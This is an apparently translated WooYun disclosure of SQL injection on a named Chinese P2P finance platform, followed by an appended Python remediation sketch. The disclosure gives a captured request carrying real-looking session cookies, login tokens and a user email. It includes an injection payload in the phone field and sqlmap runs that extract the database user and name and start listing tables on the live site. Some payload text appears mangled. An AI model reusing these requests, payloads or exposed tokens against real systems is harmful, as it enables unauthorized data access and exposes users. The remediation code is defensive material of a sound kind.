
Vulnerability summary

Defect ID: wooyun-2015-0133151

Title: SQL injection plus XSS on a P2P finance platform

Vendor: 合伙人金融

Author: 路人甲

Submitted: 2015-08-10 18:14

Fixed by: 2015-09-24 18:16

Disclosed: 2015-09-24 18:16

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-08-10: actively contacting the vendor and waiting for the vendor to claim the report; details withheld from the public
2015-09-24: the vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

A quick, shallow test.
Shenzhen Hehuoren Internet Finance Services Co., Ltd. (深圳市合伙人互联网金融服务有限公司) was founded in 2014 with registered capital of 50 million yuan. It is an internet financial services platform jointly established by Shenzhen Ziyuanyuan Investment Group Co., Ltd. (深圳市紫元元投资集团有限公司) and Shenzhen Kangwei Investment Co., Ltd. (深圳市康炜投资有限公司); the company is located at the Zhongtou International Business Center (中投国际商务中心) on Xiangmei Road, Futian District.

Detailed description:

POST injection, and time-based blind at that; I had to push --time-sec up to 200 before it returned a result. The XSS I am just noting in passing. I have not had time to look anywhere else, so that is left for whoever comes next.
Captured request file test.txt
POST /register/find_pw_getphone HTTP/1.1
Content-Length: 145
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www.hhrfs.com:443/
Cookie: WEB_PHPSESSID=ol1n68f2tckdf8thd15bk6vqk0; user_name=1908869379%40qq.com; user_id=7592; user_login_time=1439175469; user_login_token=cd996abd28bfa3b4089280d3dc3cdfac; PHPSESSID=8pvv4aedpbnfkfcgn0oukjuh50; ADMIN_PHPSESSID=s18ttov0el3vcbogi6oeuiitv3; Hm_lvt_61581e42189ee846e9853d7667f3c6f6=1439177355,1439177366,1439177417,1439177420; Hm_lpvt_61581e42189ee846e9853d7667f3c6f6=1439177420; ASP.NET_SessionId=f2mxwn45bg1ddv45qdblhd55; HMACCOUNT=8705296D8A2D6DF7; BAIDUID=8406EA95BAD0E7EE9F0F00DFCF8CED55:FG=1; pagesize=15
Host: www.hhrfs.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
phone=-1'%20OR%203*2*1%3d6%20AND%2000017%3d00017%20or%20'HPy3sVRK'%3d'&__hash__=cc4a5c9fc451afbade0cb02d4d00b427_0f0115b67f6a7c409ccfad0a68f56881
C:\Python27\sqlmap>sqlmap.py -r test.txt --time-sec 200 --threads 5 between.py -p phone --current-user --current-db
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150415}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 17:23:09
[17:23:09] [INFO] parsing HTTP request from 'test.txt'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q]
[17:23:10] [INFO] resuming back-end DBMS 'mysql'
[17:23:10] [INFO] testing connection to the target URL
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n]
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #2* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: phone=-1' OR 32) AND (SELECT * FROM (SELECT(SLEEP(200)))dNHy) AND (6158=61581=6 AND 00017=00017 or 'HPy3sVRK'='&__hash__=cc4a5c9fc451afbade0cb02d4d00b427_0f0115b67f6a7c409ccfad0a68f56881
---
[17:23:18] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
current user: 'hhr@localhost'
[17:40:08] [INFO] fetching current database
[17:40:08] [INFO] retrieved: hhr
current database: 'hhr'
available databases [2]:
[*] hhr
[*] information_schema
C:\Python27\sqlmap>sqlmap.py -r test.txt --time-sec 200 --threads 5 between.py -p phone --tables -D hhr
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150415}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 18:04:56
[18:04:56] [INFO] parsing HTTP request from 'test.txt'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q]
[18:04:57] [INFO] resuming back-end DBMS 'mysql'
[18:04:57] [INFO] testing connection to the target URL
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n]
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #2* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: phone=-1' OR 32) AND (SELECT * FROM (SELECT(SLEEP(200)))dNHy) AND (6158=61581=6 AND 00017=00017 or 'HPy3sVRK'='&__hash__=cc4a5c9fc451afbade0cb02d4d00b427_0f0115b67f6a7c409ccfad0a68f56881
---
[18:05:03] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[18:05:03] [INFO] fetching tables for database: 'hhr'
[18:05:03] [INFO] fetching number of tables for database 'hhr'
[18:05:03] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[18:05:03] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[18:06:15] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[18:06:16] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[18:06:27] [INFO] heuristics detected web page charset 'ascii'
113
[18:07:38] [INFO] retrieved: jee
The screen is already full and there are that many tables; a man has to eat. Forget it, this is as far as it goes.
It is far too slow. I need to go eat and put on some weight before I can walk the great path of penetration testing.

Proof of vulnerability:

Same as above.

Fix recommendation:

You are more professional at this than I am; if you have the budget, come to WooYun crowdsourced testing.
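The report leaves remediation to the vendor. The following Python sketch is an added illustration, not code from the report or from the platform: it writes the phone lookup behind a password-recovery endpoint two ways, the concatenated form that the time-based blind injection in the phone parameter implies, and a hardened form that allow-list-validates the phone number and binds it as a query parameter, then runs both against the request body captured above. The table and column names, the sample rows, and the 11-digit mobile-number format are assumptions; an in-memory SQLite database stands in for the platform's MySQL.

```python
"""
Added example (not from the WooYun report): the password-recovery phone
lookup written in a vulnerable and a hardened form, exercised with the
URL-encoded body captured in the report.

Assumptions (the report discloses none of this): the table is `users`
with columns id/phone/email, the sample rows are constructed, and valid
input is a mainland-China mobile number (11 digits starting with 1).
"""
import re
import sqlite3
from urllib.parse import parse_qs

# Body of the captured POST from the report; only the phone field matters here.
CAPTURED_BODY = (
    "phone=-1'%20OR%203*2*1%3d6%20AND%2000017%3d00017%20or%20'HPy3sVRK'%3d'"
    "&__hash__=cc4a5c9fc451afbade0cb02d4d00b427_0f0115b67f6a7c409ccfad0a68f56881"
)

# Assumed allow-list for the phone parameter: exactly 11 digits, leading 1.
PHONE_RE = re.compile(r"^1\d{10}$")


def decoded_phone(body: str = CAPTURED_BODY) -> str:
    """Return the URL-decoded value the server actually sees for `phone`."""
    return parse_qs(body)["phone"][0]


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the platform's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, phone TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (phone, email) VALUES (?, ?)",
        [("13800000001", "u1@example.com"), ("13800000002", "u2@example.com")],
    )
    return conn


def find_user_by_phone_unsafe(conn: sqlite3.Connection, phone: str) -> list:
    """Vulnerable pattern: the parameter is spliced into the SQL text, so the
    quote in the payload closes the literal and the rest becomes SQL."""
    sql = f"SELECT id, email FROM users WHERE phone = '{phone}'"
    return conn.execute(sql).fetchall()


def find_user_by_phone_safe(conn: sqlite3.Connection, phone: str) -> list:
    """Hardened pattern: reject anything that is not a phone number up front,
    then bind the value so the driver never interprets it as SQL."""
    if not PHONE_RE.fullmatch(phone):
        raise ValueError("phone must be an 11-digit mobile number")
    return conn.execute(
        "SELECT id, email FROM users WHERE phone = ?", (phone,)
    ).fetchall()


def run_demo() -> dict:
    """Run both lookups on the captured payload and on a legitimate number.

    The unsafe query returns every user because the injected OR clause is
    always true; the safe one rejects the payload before any query runs and
    still answers correctly for a real number.
    """
    conn = make_db()
    payload = decoded_phone()
    unsafe_rows = find_user_by_phone_unsafe(conn, payload)
    try:
        find_user_by_phone_safe(conn, payload)
        safe_outcome = "accepted"
    except ValueError:
        safe_outcome = "rejected"
    return {
        "unsafe_rows": len(unsafe_rows),
        "safe": safe_outcome,
        "legit": find_user_by_phone_safe(conn, "13800000001"),
    }


if __name__ == "__main__":
    print("decoded phone parameter:", decoded_phone())
    print(run_demo())
```

The validation step is what stops the probe in the captured request (which carries no delay function for a signature to match); the bound parameter is what would neutralise the SLEEP-based payload sqlmap later used, since it can no longer reach the query text. Both layers belong in the fix, and the same pattern applies to every other parameter the endpoint reads.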

Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting.


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively refused the report.